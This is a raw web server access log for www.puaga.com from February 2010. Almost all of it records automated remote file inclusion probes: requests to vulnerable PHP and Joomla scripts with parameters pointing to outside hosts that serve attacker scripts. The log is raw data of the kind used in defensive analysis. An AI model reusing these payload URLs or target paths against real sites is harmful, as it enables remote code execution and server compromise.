210.205.6.233 - - [20/Feb/2010:04:02:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:00 -0800] "GET /bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:00 -0800] "GET /logs/access.log%20%20//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:00 -0800] "GET /logs//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:13 -0800] "GET /logs//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:13 -0800] "GET /bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:13 -0800] "GET /logs/access.log%20%20//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:18 -0800] "GET /bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:18 -0800] "GET /logs/access.log%20%20//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:18 -0800] "GET /logs//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:03:52 -0800] "GET /logs/access_100124.log%20%20//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:04:04 -0800] "GET /logs/access_100124.log%20%20//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:04:04:18 -0800] "GET /logs/access_100124.log%20%20//bbs//calendar.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:04:58 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:04:58 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:04:58 -0800] "GET /logs//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:04:05:15 -0800] "GET /logs/access_100202.log/?g4_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:04:06:45 -0800] "GET /mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:04:06:45 -0800] "GET /logs/access_100130.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:04:06:45 -0800] "GET /logs//mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:04:06:58 -0800] "GET /?g4_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:04:07:00 -0800] "GET /logs/?g4_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:07:11 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:07:14 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:04:07:15 -0800] "GET /logs/access_100202.log/?g4_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:07:25 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:04:07:39 -0800] "GET /logs/access_100130.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:04:07:40 -0800] "GET /mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:04:07:40 -0800] "GET /logs//mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:08:14 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:08:17 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:08:18 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:08:47 -0800] "GET /logs/access_100130.log%20%20//mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:08:47 -0800] "GET /mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:08:47 -0800] "GET /logs//mcf.php?content=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:11:03 -0800] "GET /logs/access_100204.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:11:53 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:11:53 -0800] "GET /logs//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:11:53 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:04:12:18 -0800] "GET /logs/access_100124.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:04:12:18 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:04:12:18 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:04:12:27 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:04:12:27 -0800] "GET /logs/access_100124.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:04:12:27 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:12:28 -0800] "GET /logs//bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:12:28 -0800] "GET /logs/access_100125.log%20%20//bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:12:29 -0800] "GET /bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:12:45 -0800] "GET /logs/access_100207.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:12:46 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:12:46 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:12:46 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:14:21 -0800] "GET /logs/access_100120.log%20%20//bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:04:14:35 -0800] "GET /logs/access_100124.log%20//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:14:54 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:14:54 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:14:54 -0800] "GET /logs//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:04:14:57 -0800] "GET /logs/access_100124.log%20//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:15:04 -0800] "GET /logs/access_100205.log///write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:15:05 -0800] "GET /logs//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:15:05 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:15:05 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:15:08 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:15:09 -0800] "GET //write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:15:27 -0800] "GET /logs/access_100205.log///write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:15:31 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:15:31 -0800] "GET //write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:16:07 -0800] "GET /logs/access_100207.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:16:19 -0800] "GET /logs/access_100207.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:04:18:04 -0800] "GET /logs/access_100204.log%20%20//errors.php?error=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:18:26 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:18:26 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:18:26 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [20/Feb/2010:04:19:13 -0800] "GET /ideal/?N=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
222.231.24.246 - - [20/Feb/2010:04:20:45 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:20:45 -0800] "GET /skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:20:45 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:20:53 -0800] "GET /delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:20:53 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:20:53 -0800] "GET /logs/access_100121.log%20%20//delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:21:11 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:21:11 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [20/Feb/2010:04:21:11 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:21:17 -0800] "GET /skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:21:17 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [20/Feb/2010:04:21:20 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [20/Feb/2010:04:21:20 -0800] "GET //write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [20/Feb/2010:04:21:20 -0800] "GET /logs/access_100205.log%20%20///write_comment_update.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:21:22 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:25:26 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:25:26 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:25:26 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:25:28 -0800] "GET /bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:04:25:28 -0800] "GET /logs/access_100125.log%20%20//bbs/good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:25:44 -0800] "GET //write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:25:44 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:25:44 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:25:44 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:25:47 -0800] "GET /logs/access_100205.log%20%20///write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [20/Feb/2010:04:25:47 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:04:25:48 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:04:25:54 -0800] "GET /logs/access_100201.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:25:57 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:25:57 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:25:57 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:25:57 -0800] "GET /skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:25:57 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:25:57 -0800] "GET /logs/access_100114.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:26:21 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:04:26:50 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/2/18/2765513/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:27:02 -0800] "GET /skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:27:02 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:04:27:02 -0800] "GET /logs/access_100114.log%20%20//skin/zero_vote/login.php?dir=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:27:41 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:27:41 -0800] "GET /logs/access_100115.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:04:27:41 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
